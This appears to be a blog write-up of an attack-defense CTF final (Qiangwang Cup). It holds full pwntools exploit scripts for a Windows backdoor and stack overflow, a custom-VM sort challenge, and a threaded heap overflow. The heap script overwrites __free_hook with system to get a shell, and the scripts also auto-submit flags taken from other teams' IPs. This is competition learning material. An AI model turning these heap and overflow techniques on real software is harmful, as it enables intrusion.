强网杯_final

强网杯_final

没想到第一次打线下就回到了家乡河南,强网有排面!!
线下赛赛制为AD(awd)和RW(real world),real world就相当与挖掘0day,难度不言而喻,AD的话只有pwn题,占50%的分数,因此pwn采用的是只打ad的策略,最后也取得了不错的效果。

AD的赛前准备

打AD要想获得不错的成绩,我认为最重要的就是要抢占先机。率先发现漏洞,并写出exp,往往能打得别人措手不及,因此赛前的脚本准备往往非常重要。

准备脚本一般分为两类:1.批量IP生成脚本。2.批量交flag的脚本。
批量IP生成脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import sys

f = open("ip.txt","wb")

try:
	ip = sys.argv[1]
	range_ = int(sys.argv[2])
	for i in range(1,range_):
		t = ip.replace("x",str(i))
		f.write(t+'\n')
except:
	print "usage: python %s ip range" % sys.argv[0]
	f.close()

f.close()

usage:
python ip.py 172.168 .1 .1 :x 20

批量交flag脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
if __name__ == "__main__":
	# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	# elf = ELF("./pwn",checksec=False)
	ips = [i.strip() for i in open("ip.txt","rb").readlines()]
	while 1:
		for ip in ips:
			try:
				sleep(0.3)
				flag = main(ip)
				# flag = main(args["REMOTE"])
				info(flag)
				url = 'https://172.20.1.1/Answerapi/sub_answer_api'
				token = 'token9013e05455d'
				cmds = 'curl -k {} -d "answer={}&playertoken={}"'.format(url,flag.strip(),token)
				print cmds
				if 'flag' in cmds:
					os.system(cmds)
			except Exception,err:
				# p.close()
				print err
				continue

适用于有curl接口的AD,若没此接口,则先抓包,写出sub_flag函数批量提交。

AD全程高能

Pwn题一共出了4道。

win(一道windows下的栈溢出)

pd0(go写的一个框架)

sort(vm_pwn)

thrd(线程堆题)

个人认为最难的是pd0,好像只有0x300R第二天做出来了,疯狂打群场。不过我们守住了,ruan师傅在github上找到了源码,打patch改了max_size,nb!

下面依次分析:

0x01 win

win是第一个放出的题目,仅过4分钟vidar-time就发起进攻,我们也瞬间反应过来这道题目有后门果然:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
if ( !memcmp(v43, "vvqqccqaFEFH", v45) && v44 == 12 ) 我patch过了已经
      {
        v46 = fopen("flag.txt", "r");
        if ( !v46 )
        {
          v47 = sub_1400060E0(std::cout, (__int64)"Can't open the flag file");
          std::basic_ostream<char,std::char_traits<char>>::operator<<(v47, sub_1400062B0);
          exit(1);
        }
        while ( !feof(v46) )
        {
          if ( fgets(&Buf, 128, v46) )
          {
            v48 = sub_1400060E0(std::cout, (__int64)&Buf);  //cout<<flag!!
            std::basic_ostream<char,std::char_traits<char>>::operator<<(v48, sub_1400062B0);
          }
        }
        fclose(v46);
      }

第一波脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def main(host,port=16957):
	global p
	if host:
		p = remote(host,port,timeout=1)
	else:
		p = process("./pwn_bak.bak.bak")
		# debug(0x000000000000107B)
	p.recvuntil("[*] Rounds 1 $")
	p.sendline("Banner hide")
	p.sendline("wwssadadBABA")
	p.recvuntil("wwssadadBABA ]\r\n")
	try:
		# p.sendline("cat flag")
		# p.recv(timeout=0.5)
		flag = p.recvuntil("\r\n",drop=True,timeout=0.5)
		info(flag)
		p.close()
		return flag
	except Exception,err:
		print err
		p.close()
		return "bad_luck"

直接打到第六,但其他队也不是吃素的,patch改”wwssadadBABA”为其他字符串。

之后又有一个洞在这里:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
sub_1400060E0(v5, (__int64)"Please input the password: ");
  sub_140007060(std::cin, &password);
  v6 = &password;
  v7 = (char *)password;
  v8 = v31;
  if ( v31 >= 16 )
    v6 = password;
  memcpy(&Dst, v6, Size);  size为实际的password长度
  if ( strncmp(&Dst, "I_Love_QWB", 0xAui64) )
  {
    v9 = sub_1400060E0(std::cout, (__int64)"Your password ");
    v10 = sub_1400060E0(v9, (__int64)&Dst);
    v11 = sub_1400060E0(v10, (__int64)" seems not true!");
    std::basic_ostream<char,std::char_traits<char>>::operator<<(v11, sub_1400062B0);
    sub_1400060E0(std::cout, (__int64)"Try again: ");
    sub_140007060(std::cin, &password);
    v12 = &password;
    v7 = (char *)password;
    v8 = v31;
    if ( v31 >= 0x10 )
      v12 = password;
    memcpy(&Dst, v12, Size);

可见,第一次输入较长的password可以泄露出stack上的地址,然后再借助第二次的try again覆盖返回地址为上面后门函数的地址即可!

patch限制size为0x30,栈溢出不了。

0x02 pd0

源码地址:https://github.com/HITB-CyberWeek/proctf-2019/blob/master/services/handy/server/main.go

Fixing:
Either the padding should be removed or a handler should be modified to not leak the information, e.g. by changing the max allowed size of the generated picture.

0x03 sort

感觉是最有意思的一题。
题目意思是要完成对一个随机数组进行排序,所执行的汇编指令越少分数越高,分高的一方获胜,攻击方获胜拿flag,防守方获胜则攻击方无法拿flag.
同时有给出了出题人自己写的汇编指令系统,还要opcode和初赛的qwlogin一样,省去了逆opcode的时间。

opcode:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>
#include <malloc.h>
#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>


//INST
#define HLT 0x00
#define MOV 0x01
//CALC
#define ADD 0x02
#define SUB 0x03
#define MUL 0X04
#define DIV 0x05
#define MOD 0X06
//BIT
#define XOR 0x07
#define OR  0x08
#define AND 0x09
#define SHL 0x0a
#define SHR 0x0b
#define NOT 0x0c
//STACK
#define POP  0x0d
#define PUSH 0x0e
//FUNC
#define CALL 0x10
#define RET  0x11
//JMP
#define CMP 0x12
#define JMP 0x13
#define JE  0x14
#define JNE 0x15
#define JG  0x16
#define JNG 0x17
#define JL  0x18
#define JNL 0x19
#define JA  0x1a
#define JNA 0x1b
#define JB  0x1c
#define JNB 0x1d
//INT
#define SYSCALL 0x20

//ADDR
#define RR  0X00
#define RL  0x01
#define LR  0x02
#define RS  0x03
#define SR  0x04
#define RI  0x05
#define R_  0X06
#define I_  0x07
#define L_  0x08
#define S_  0x09
#define __  0x0a
#define PR  0x0b //RegLoad Reg
#define RP  0x0c //Reg RegLoad
#define QR  0x0d //RegStack Reg
#define RQ  0x0e //Reg RegStack

//WIDTH
#define BYTE  0x10
#define WORD  0x20
#define DWORD 0x30
#define QWORD 0x40

#define WIDTH(X) (X & 0xf0)
#define ADDR(X)  (X & 0x0f)

#define S_O(X) (X |= 0b0000000000000001)
#define S_S(X) (X |= 0b0000000000000010)
#define S_Z(X) (X |= 0b0000000000000100)
#define S_C(X) (X |= 0b0000000000001000)

#define C_O(X) (X &= ~(0b0000000000000001))
#define C_S(X) (X &= ~(0b0000000000000010))
#define C_Z(X) (X &= ~(0b0000000000000100))
#define C_C(X) (X &= ~(0b0000000000001000))


#define R_O(X) (X & 0b0000000000000001)
#define R_S(X) ((X & 0b0000000000000010) >> 1)
#define R_Z(X) ((X & 0b0000000000000100) >> 2)
#define R_C(X) ((X & 0b0000000000001000) >> 3)

enum SYSCALLS {
    _SYS_OPEN = 0,
    _SYS_READ = 1,
    _SYS_WRITE,
    _SYS_CLOSE
};

接下来就得手撕汇编了,我们选择了较为简单的冒泡排序,又因为没有那种直接操作内存的指令,就只能用寄存器传递,导致效率并不是很高。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
from pwn import *

context.arch = 'amd64'

def main(host,port=14640):
	global p
	if host:
		p = remote(host,port)
	else:
		# pass
		p = process("./BATTLE",aslr=False)
		# gdb.attach(p,"b *0x555555554000+0x00000000000EEb9 if $rdx == 0x1e")

		# gdb.attach(p,"b *0x555555554000+0x00000000000F238")
	p.recvuntil("Beat Me!")
	code = ''
																# loop1:
	code += p8(0x12) + p8(0x15) + p8(3) + p8(99)				# 	cmp r3,99
	code += p8(0x16) + p8(0x17) + p8(0x65)						# 	JG exit
	code += p8(0x1)	+ p8(0x40) + p8(6) + p8(3)					# 	mov r6,r3
	code += p8(0x1) + p8(0x15) + p8(0) + p8(99)					# 	mov r0,99
	code += p8(0x3) + p8(0x40) + p8(0) + p8(6)					# 	sub r0,r6
	code += p8(0x1) + p8(0x45) + p8(4) + p64(0)					# 	mov r4,0
																# loop2:
	code += p8(0x12) + p8(0x40) + p8(4) + p8(0)					# 	cmp r4,r0
	code += p8(0x14) + p8(0x17) + p8(0x38)						#	je update
	code += p8(0x1)	+ p8(0x40) + p8(5) + p8(4)					#	mov r5,r4
	code += p8(0x4)	+ p8(0x25)	+ p8(5) + p16(8)				# 	mul r5,8
	code += p8(0x1) + p8(0x4c)	+ p8(1) + p8(5)					# 	mov r1,mem[r5]
	code += p8(0x1)	+ p8(0x40) + p8(6) + p8(5)					# 	mov r6,r5
	code += p8(0x2) + p8(0x25)	+ p8(6) + p16(8)				#	add r6,8
	code += p8(0x1) + p8(0x4c)	+ p8(2) + p8(6)					#	mov r2,mem[r6]
	code += p8(0x12) + p8(0x40) + p8(1) + p8(2)					#	cmp r1,r2
	code += p8(0x1c) + p8(0x17) + p8(8)							#	jb next
	code += p8(0x1) + p8(0x4b)	+ p8(6) + p8(1)					#	mov mem[r6],r1
	code += p8(0x1) + p8(0x4b)	+ p8(5) + p8(2)					#	mov mem[r5],r2
																# next:
	code += p8(0x2) + p8(0x25)	+ p8(4) + p16(1)				#	add r4,1
	code += p8(0x13) + p8(0x47)	+ p64(-0x3f+0x10000000000000000)#	jmp loop2
																# update:
	code += p8(0x2) + p8(0x25)	+ p8(3) + p16(1)				#	add r3,1
	code += p8(0x13) + p8(0x47)	+ p64(-0x6c+0x10000000000000000)#	jmp loop1
																# exit:
	code += p8(0x20) + "AAAAAAAAA"
	p.send(code)
	p.recvuntil("WINNER!\n")
	try:
		# p.recvuntil("ftp>")
		# p.sendline("type flag.txt")
		# p.recv(timeout=0.5)
		flag = p.recvuntil("\n",drop=True,timeout=0.5)
		info(flag)
		p.close()
		return flag
	except Exception,err:
		print err
		p.close()
		return "bad_luck"
	# p.interactive()

if __name__ == "__main__":
	# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	# elf = ELF("./pwn",checksec=False)
	ips = [i.strip() for i in open("ip.txt","rb").readlines()]
	while 1:
		for ip in ips:
			try:
				sleep(0.3)
				flag = main(ip)
				# flag = main(args["REMOTE"])
				info(flag)
				url = 'https://172.20.1.1/Answerapi/sub_answer_api'
				token = 'token7024a591c07'
				cmds = 'curl -k {} -d "answer={}&playertoken={}"'.format(url,flag.strip(),token)
				print cmds
				if 'flag' in cmds:
					os.system(cmds)
					# pause()
			except Exception,err:
				p.close()
				print err
				continue

VM_pwn一定要耐心!!!一边写,一边调。

0x04 thrd

最后一题终于是heap题了,但牵扯到线程的条件竞争问题,使得调试起来会很奇怪。

漏洞存在于edit函数中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
int __fastcall edit(unsigned int a1, unsigned int a2, int a3)
{
  unsigned __int64 v3; // rax
  int v4; // er12

  if ( a1 <= 0xF )
  {
    if ( heaplist[a1] )
    {
      v3 = sizelist[a1] - 4LL; 当size为0时,v3=-4(unsigned int),造成堆溢出
      if ( a2 <= v3 )
      {
        v4 = a3;
        pthread_mutex_lock(&mutex);
        *(_DWORD *)(heaplist[a1] + a2) = v4;
        LODWORD(v3) = pthread_mutex_unlock(&mutex);
      }
    }
  }
  return v3;
}

还有一个洞是在enc中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
void __fastcall enc(unsigned int a1, int a2)
{
  __int64 idx; // rbx
  const char *v3; // rdi
  unsigned int content_len; // er12
  unsigned int v5; // eax
  _DWORD *v6; // rdx
  __int64 v7; // rax

  if ( a1 <= 0xF )
  {
    idx = a1;
    v3 = (const char *)heaplist[a1];
    if ( v3 )
    {
      content_len = strlen(v3);
      pthread_mutex_lock(&mutex);
      v5 = content_len >> 2;
      if ( (content_len >> 2) & 3 )
      {
        ++v5;
        v6 = (_DWORD *)heaplist[idx];
      }
      else
      {
        v6 = (_DWORD *)heaplist[idx];
        if ( !v5 )
        {
LABEL_7:
          pthread_mutex_unlock(&mutex);
          return;
        }
      }
      v7 = (__int64)&v6[v5];
      do
      {
        *v6 ^= a2;
        ++v6;
      }
      while ( v6 != (_DWORD *)v7 );
      goto LABEL_7;
    }
  }
}

这个的逻辑主要是进行了异或的操作,但漏洞是strlen()函数,当填满堆后strlen会拿到下一个heap的size为,从而我们可以修改下一个heap的size。

程序一开始给出了elf基地址,PIE白开了,还能控制next heap’s size,因此可以unlink,但中间show泄露的时候,由于线程竞争问题,需要对heap进行修复,当时是抄流量才知道的,很迷。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
from pwn import *

context.arch = 'amd64'


def add(idx,sz):
	return p32(1) + p32(idx) + p32(sz)
def show(idx):
	return p32(3) + p32(idx)
def dele(idx):
	return p32(4) + p32(idx)
def xor_(idx,value):
	return p32(6) + p32(idx) + p32(value)
def edit(idx,offset,value):
	return p32(2) + p32(idx)+p32(offset) + p32(value)



def main(host,port=17066):
	global p
	if host:
		p = remote(host,port,timeout=1)
	else:
		p = process("./pwn_bak.bak.bak")
		# debug(0x000000000000107B)
	libc.address = 0
	p.recvuntil("mem: ")
	elf_addr = int(p.recvuntil('\n',drop=True),16) - 0x2021a0
	backdoor = elf_addr+0x000000000000DB0
	info("elf : " + hex(elf_addr))
	ptr = elf_addr + 0x000000000202120
	action = ''
	action += add(0,0x28) + add(1,0xf0) + add(2,0xf0) + add(3,0xf0) + add(4,0xf0) + add(5,0xf0)
	for i in range(0,0x28,4):
		action += edit(0,i,u32("efbead6e".decode('hex')))

	action += xor_(0,0x401)

	data = p32(0)*2+p64(0x21)
	data += p32(0xffffffff&(ptr-0x18)) + p32((ptr-0x18)>>32)
	data += p32(0xffffffff&(ptr-0x10)) + p32((ptr-0x10)>>32)
	data += p32(0x20) + p32(0)

	for i in range(0,0x28,4):
		action += edit(0,i,u32(data[i:i+4]))

	action += dele(1) + add(6,0xf0)
	action += edit(6,0x10,0x30) + edit(6,0x18,0x11)
	action += edit(0,0x18,0xffffffff&ptr) + edit(0,0x1c,ptr>>32)
	action += edit(0,0x8,0xffffffff&(elf_addr+0x201F50)) + edit(0,0xc,(elf_addr+0x201F50)>>32)
	action += show(1)

	p.sendline(action)

	p.recvuntil("content: ")
	libc.address = u64(p.recv(6).ljust(8,"\x00")) - libc.symbols["free"]
	info("libc : " + hex(libc.address))

	sleep(1)


	action = ''
	action += edit(0,0x10,0xffffffff&(libc.symbols["__free_hook"]-8)) + edit(0,0x14,(libc.symbols["__free_hook"]-8)>>32)
	action += edit(2,0,u32("/bin")) + edit(2,0x4,u32("/sh\x00"))
	action += edit(2,8,0xffffffff&(libc.symbols["system"])) + edit(2,0xc,(libc.symbols["system"])>>32)
	action += dele(2)

	p.sendline(action)
	sleep(0.3)
	p.sendline(";echo hack_by_qwruan && cat flag")
	p.recvuntil("qwruan\n")
	try:
		p.recvuntil("flag",timeout=0.5)
		flag = "flag" + p.recvuntil("\n",timeout=0.5)
		info(flag)
		p.close()
		return flag
	except Exception,err:
		print err
		p.close()
		return "bad_luck"
	# p.interactive()

if __name__ == "__main__":
	# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	# elf = ELF("./pwn",checksec=False)
	ips = [i.strip() for i in open("ip.txt","rb").readlines()]
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	while 1:
		for ip in ips:
			try:
				sleep(1)
				flag = main(ip)
				# flag = main(args["REMOTE"])
				info(flag)
				url = 'https://172.20.1.1/Answerapi/sub_answer_api'
				token = 'token9013e05455d'
				cmds = 'curl -k {} -d "answer={}&playertoken={}"'.format(url,flag.strip(),token)
				print cmds
				if 'flag' in cmds:
					os.system(cmds)
			except Exception,err:
				p.close()
				print err
				continue

ruan师傅nb,我还是太年轻了。还有很长的路要走:D

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

Pwner<br>CTF is a part of my life.<br>